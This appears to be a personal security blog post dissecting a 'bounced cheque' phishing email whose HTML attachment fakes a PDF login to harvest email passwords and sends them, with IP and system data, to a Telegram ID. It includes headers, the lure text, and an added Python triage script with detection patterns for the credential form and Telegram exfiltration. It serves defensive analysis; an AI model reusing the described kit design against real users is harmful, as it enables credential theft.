Sending You the Bounced Cheque… – Malware


Sending you the bounced cheque... - Malware/Phishing

This one required the scammer to do a little work before they sent out their mass email.

The body of the message is fairly straightforward; it is just trying to get me to open the attachment.

The first indication that this is likely a scam or contains malware is that they want me to open the attachment. The second is the spelling of “sinding” and “cheque”. Cheque is the European spelling of check, but this email is coming from the U.S.

So, what do I do? I open the attachment (in my sandboxed environment of course).

Now I have to say that this is one of the cooler scams I have seen, at least in the sense that it is different and I could see someone clicking on it.

Email Header:

Received: from hwsrv-895150.hostwindsdns.com ([23.254.203.197])
by host.averagejoeweeky.com with esmtps (TLS1.2) tls TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
(Exim 4.94.2)
(envelope-from <admin@iccadmin.com>)
id 1madqx-00076O-RY
for joe@averagejoeweeky.com; Wed, 13 Oct 2021 08:59:27 -0400
Received: from iccadmin.com (unknown [20.102.56.31])
by hwsrv-895150.hostwindsdns.com (Postfix) with ESMTPA id F1FBB4D43
for <joe@averagejoeweeky.com>; Wed, 13 Oct 2021 12:59:14 +0000 (UTC)
From: Mark Johnson<admin@iccadmin.com>
To: joe@averagejoeweeky.com
Subject: Sending you the bounced cheque…
Date: 13 Oct 2021 12:59:11 +0000
Message-ID: <20211013125911.52F66D7805C439EA@iccadmin.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;

The sender domain is iccadmin.com, which has nothing visible at that address; the domain name was registered on June 15, 2021 and has domain privacy enabled.

The email appeared to come from a leased Microsoft IP address out of Virginia.


The full email body is:

Email Body:
Message-ID: <20211013125911.52F66D7805C439EA@iccadmin.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0012_AD5C13A4.A3F28E3E"
This is a multi-part message in MIME format.
------=_NextPart_000_0012_AD5C13A4.A3F28E3E
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

w3.org/TR/html4/loose.dtd">

Good day,

I'm sinding you the bounced cheque we received,
pl=

ease kindly check and revert back to use as we are working on the project. =

Best regards,
Mark Johnson
Superintendent...
A&G.</=

P>
------=_NextPart_000_0012_AD5C13A4.A3F28E3E
Content-Type: text/html; name="BOUNCED CHEQUE NO 003278.htm"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="BOUNCED CHEQUE NO 003278.htm"
****************************** TRUNCATED ***************************************************
------=_NextPart_000_0012_AD5C13A4.A3F28E3E--

The attachment is actually designed to try to do two different tasks. The first is to get your email password. When you launch the attachment, it opens this fancy HTML and JavaScript page (base64 encoded inside the email) that makes it look like you need to enter a password to get to a “protected” Adobe Acrobat PDF file. The file itself does not exist; the background of the page is just a blurry grab of a random PDF file.

Here is the base64 encoded HTML attachment from the email, decoded, and how it works (I redacted the dangerous parts):

******* Creating what you see *********
This is the section that sets up what you visibly can see.

[markup and styles not preserved in this copy of the post]

******* END Creating what you see *****************

******* Start some of the bad stuff ***************
This is the payload, or the part that does the damage.

[script not preserved in this copy of the post; what follows is the inline base64 image (a fixed-position img tag) and the visible text of the login form]

Sign in to view the document

Must be a valid email address.

Your password must be at least 6 characters as well as contain at least one uppercase, one lowercase, and one number.

The whole process above is designed to have you input the password for your email address. It relies on human nature: since the page asks for the password that goes with the email address, people will automatically type in their email password. They collect some other information as well:

  • Your username and password
  • OS version
  • Your IP address, which they look up via ipinfo.io; that gives them:
    ip: "212.102.51.201"  (my proxy IP address)
    hostname: "unn-212-102-51-201.cdn77.com"
    city: "Tokyo"
    region: "Tokyo"
    country: "JP"
    loc: "35.6769,139.6520"
    org: "AS60068 Datacamp Limited"
    postal: "168-0063"
    timezone: "Asia/Tokyo"
    asn:
        asn: "AS60068"
        name: "Datacamp Limited"
        domain: "datacamp.co.uk"
        route: "212.102.50.0/23"
        type: "isp"
    company:
        name: "Datacamp Limited"
        domain: "datacamp.co.uk"
        type: "isp"
    privacy:
        vpn: true
        proxy: false
        tor: false
        hosting: false
        relay: false
    abuse:
        address: "DataCamp Limited, 207 Regent Street, London, United Kingdom"
        country: "JP"
        email: "abuse@datacamp.co.uk"
        name: "Abuse Contact"
        network: "212.102.50.64-212.102.51.255"
        phone: ""
    domains:
        total: 0
        domains: []
  • But they only keep the IP, country name, city, region and currency
  • They also query the local system for the time and screen size

This information is also sent via Telegram (the messaging app) to ID 1001228517612.

They actually do a fair amount of parsing within the HTML/JavaScript itself, instead of within the PHP script on the compromised domain.

As an example, they parse the domain out of the email address joe@averagejoeweekly.com to build http://averagejoeweekly.com.
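As an added example (my own code, not the scammer's kit or anything from the post), here is a small Python triage script that applies the analysis above to a raw message: it pulls the originating IP from the bottom Received header, decodes the .htm attachment, and flags the traits described in this post (password form, ipinfo.io lookup, Telegram exfiltration, inline base64 image). The Received headers, MIME boundary and attachment name are copied from the post; the kit HTML itself is a constructed stand-in that only reproduces those traits.

```python
import base64
import re
from email import message_from_string, policy
# Constructed sample: the Received headers, boundary and attachment name are copied from
# the post; the kit HTML is a stand-in that only reproduces the traits the post describes.
KIT_HTML = ('<html><body><img src="data:image/jpeg;base64,/9j/AA==" alt="">'
            '<p>Sign in to view the document</p>'
            '<input id="email" type="text"><input id="pass" type="password">'
            '<script>fetch("https://ipinfo.io/json");'
            'fetch("https://api.telegram.org/bot<TOKEN>/sendMessage");</script>'
            '</body></html>')
B = "----=_NextPart_000_0012_AD5C13A4.A3F28E3E"
RAW_EMAIL = "\n".join([
    "Received: from hwsrv-895150.hostwindsdns.com ([23.254.203.197]) by host.averagejoeweeky.com with esmtps (Exim 4.94.2)",
    "Received: from iccadmin.com (unknown [20.102.56.31]) by hwsrv-895150.hostwindsdns.com (Postfix) with ESMTPA id F1FBB4D43",
    f'Content-Type: multipart/mixed; boundary="{B}"',
    "",
    f"--{B}",
    'Content-Type: text/html; name="BOUNCED CHEQUE NO 003278.htm"',
    "Content-Transfer-Encoding: base64",
    'Content-Disposition: attachment; filename="BOUNCED CHEQUE NO 003278.htm"',
    "",
    base64.b64encode(KIT_HTML.encode()).decode(),
    f"--{B}--",
])

# Traits the post identifies in the decoded attachment.
INDICATORS = {
    "password_form": re.compile(r'type\s*=\s*["\']?password', re.I),
    "geoip_lookup": re.compile(r"ipinfo\.io", re.I),
    "telegram_exfil": re.compile(r"api\.telegram\.org", re.I),
    "inline_image": re.compile(r"data:image/\w+;base64,", re.I),
}

def originating_ip(msg):
    # The bottom-most Received header is the hop closest to the sender.
    hops = msg.get_all("Received") or [""]
    m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", hops[-1])
    return m.group(1) if m else None

def triage(raw):
    """Return the originating IP and the kit traits found in each .htm attachment."""
    msg = message_from_string(raw, policy=policy.default)
    report = {"origin_ip": originating_ip(msg), "attachments": []}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name.lower().endswith((".htm", ".html")):
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(part.get_content()))
            report["attachments"].append({"filename": name, "indicators": hits})
    return report
```

Running `triage(RAW_EMAIL)` on the constructed sample reports the 20.102.56.31 hop and all four traits for the .htm attachment; on a real message, any one of the Telegram or ipinfo.io hits inside an HTML attachment is worth quarantining on its own.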

Analysis:

Running this through VirusTotal shows:

Based on that, AV is picking this up as Cryxos, which must be what the PHP script on the compromised website is doing. I can't penetrate that script; they have it fairly well protected, but it is the script that sets off the anti-virus software. Once the URL is removed, the script passes AV scans. The fact that they detect it as a Cryxos variant means they must be turning this into some sort of ransomware as well, so not only are they collecting your email password, they are trying to infect that system with ransomware. That said, I don't see anything in the above that signals ransomware. My locally installed AV picks it up as HEUR:Trojan.Script.Generic, which makes more sense.

Welcome to the Average Joe Weekly blog. This is basically my place on the web where I can help spread some of the knowledge that I have accumulated over the years. I served 10+ years in the Marine Corps on Active Duty, but that was some 25 years ago.
By Average Joe